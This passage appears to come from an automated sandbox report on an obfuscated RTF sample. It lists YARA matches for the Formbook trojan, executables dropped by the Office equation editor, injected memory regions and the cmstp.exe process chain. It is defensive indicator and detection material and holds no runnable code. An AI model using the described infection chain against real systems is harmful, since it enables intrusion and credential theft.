          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: twbcaze.exe PID: 3164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: twbcaze.exe PID: 3172, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmstp.exe PID: 3216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\balokarat2.1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004047D35_2_004047D3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004061D45_2_004061D4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_004162606_2_00416260
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_004212086_2_00421208
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_00416BCD6_2_00416BCD
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_00410BF06_2_00410BF0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_002308B76_2_002308B7
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_00230A2D6_2_00230A2D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041E1CF7_2_0041E1CF
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041EB5A7_2_0041EB5A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041E42B7_2_0041E42B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041E54B7_2_0041E54B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041ED507_2_0041ED50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041D5637_2_0041D563
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041D5667_2_0041D566
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041DD6E7_2_0041DD6E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00409E4D7_2_00409E4D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00409E507_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084E0C67_2_0084E0C6
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084E2E97_2_0084E2E9
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F63BF7_2_008F63BF
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008763DB7_2_008763DB
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008523057_2_00852305
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0089A37B7_2_0089A37B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D443E7_2_008D443E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D05E37_2_008D05E3
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0086C5F07_2_0086C5F0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008965407_2_00896540
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008546807_2_00854680
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0085E6C17_2_0085E6C1
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F26227_2_008F2622
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0089A6347_2_0089A634
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0085C7BC7_2_0085C7BC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0085C85C7_2_0085C85C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0087286D7_2_0087286D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F098E7_2_008F098E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008529B27_2_008529B2
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008669FE7_2_008669FE
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008E49F57_2_008E49F5
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0089C9207_2_0089C920
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008FCBA47_2_008FCBA4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D6BCB7_2_008D6BCB
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F2C9C7_2_008F2C9C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008DAC5E7_2_008DAC5E
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00880D3B7_2_00880D3B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0085CD5B7_2_0085CD5B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00882E2F7_2_00882E2F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0086EE4C7_2_0086EE4C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008ECFB17_2_008ECFB1
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008C2FDC7_2_008C2FDC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00860F3F7_2_00860F3F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0087D0057_2_0087D005
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008530407_2_00853040
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0086905A7_2_0086905A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008CD06D7_2_008CD06D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008DD13F7_2_008DD13F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F12387_2_008F1238
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084F3CF7_2_0084F3CF
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008573537_2_00857353
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008854857_2_00885485
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008614897_2_00861489
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0088D47D7_2_0088D47D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008F35DA7_2_008F35DA
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0085351F7_2_0085351F
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D579A7_2_008D579A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008857C37_2_008857C3
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008E771D7_2_008E771D
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008CF8C47_2_008CF8C4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008EF8EE7_2_008EF8EE
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D394B7_2_008D394B
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008D59557_2_008D5955
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00903A837_2_00903A83
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084FBD77_2_0084FBD7
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008DDBDA7_2_008DDBDA
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00877B007_2_00877B00
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008EFDDD7_2_008EFDDD
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008DBF147_2_008DBF14
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0087DF7C7_2_0087DF7C
          Source: C:\Windows\explorer.exeCode function: 8_2_081880368_2_08188036
          Source: C:\Windows\explorer.exeCode function: 8_2_0817F0828_2_0817F082
          Source: C:\Windows\explorer.exeCode function: 8_2_081869128_2_08186912
          Source: C:\Windows\explorer.exeCode function: 8_2_08180D028_2_08180D02
          Source: C:\Windows\explorer.exeCode function: 8_2_0818C5CD8_2_0818C5CD
          Source: C:\Windows\explorer.exeCode function: 8_2_081892328_2_08189232
          Source: C:\Windows\explorer.exeCode function: 8_2_08183B308_2_08183B30
          Source: C:\Windows\explorer.exeCode function: 8_2_08183B328_2_08183B32
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA62328_2_08CA6232
          Source: C:\Windows\explorer.exeCode function: 8_2_08C9C0828_2_08C9C082
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA50368_2_08CA5036
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA95CD8_2_08CA95CD
          Source: C:\Windows\explorer.exeCode function: 8_2_08C9DD028_2_08C9DD02
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA39128_2_08CA3912
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA0B328_2_08CA0B32
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA0B308_2_08CA0B30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECE0C69_2_01ECE0C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EF63DB9_2_01EF63DB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F763BF9_2_01F763BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F1A37B9_2_01F1A37B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED23059_2_01ED2305
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECE2E99_2_01ECE2E9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F505E39_2_01F505E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EEC5F09_2_01EEC5F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F165409_2_01F16540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5443E9_2_01F5443E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDC7BC9_2_01EDC7BC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDE6C19_2_01EDE6C1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED46809_2_01ED4680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F1A6349_2_01F1A634
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F726229_2_01F72622
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F649F59_2_01F649F5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE69FE9_2_01EE69FE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED29B29_2_01ED29B2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F7098E9_2_01F7098E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F1C9209_2_01F1C920
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EF286D9_2_01EF286D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDC85C9_2_01EDC85C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F56BCB9_2_01F56BCB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F7CBA49_2_01F7CBA4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EDCD5B9_2_01EDCD5B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F00D3B9_2_01F00D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F72C9C9_2_01F72C9C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5AC5E9_2_01F5AC5E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F42FDC9_2_01F42FDC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6CFB19_2_01F6CFB1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE0F3F9_2_01EE0F3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EEEE4C9_2_01EEEE4C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F02E2F9_2_01F02E2F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5D13F9_2_01F5D13F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F4D06D9_2_01F4D06D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED30409_2_01ED3040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE905A9_2_01EE905A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EFD0059_2_01EFD005
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECF3CF9_2_01ECF3CF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED73539_2_01ED7353
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F712389_2_01F71238
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F735DA9_2_01F735DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ED351F9_2_01ED351F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EE14899_2_01EE1489
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F054859_2_01F05485
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F0D47D9_2_01F0D47D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F057C39_2_01F057C3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5579A9_2_01F5579A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6771D9_2_01F6771D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F559559_2_01F55955
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5394B9_2_01F5394B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6F8EE9_2_01F6F8EE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F4F8C49_2_01F4F8C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5DBDA9_2_01F5DBDA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01ECFBD79_2_01ECFBD7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EF7B009_2_01EF7B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F83A839_2_01F83A83
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F6FDDD9_2_01F6FDDD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EFDF7C9_2_01EFDF7C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01F5BF149_2_01F5BF14
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AE54B9_2_000AE54B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AD5669_2_000AD566
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AEB5A9_2_000AEB5A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AED509_2_000AED50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00092D909_2_00092D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00099E4D9_2_00099E4D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00099E509_2_00099E50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_00092FB09_2_00092FB0
          Source: C:\Windows\SysWOW64\cmstp.exeProcess Stats: CPU usage > 49%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 771D0000 page execute and read and writeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exeJump to behavior
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.881171114.0000000008CBE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
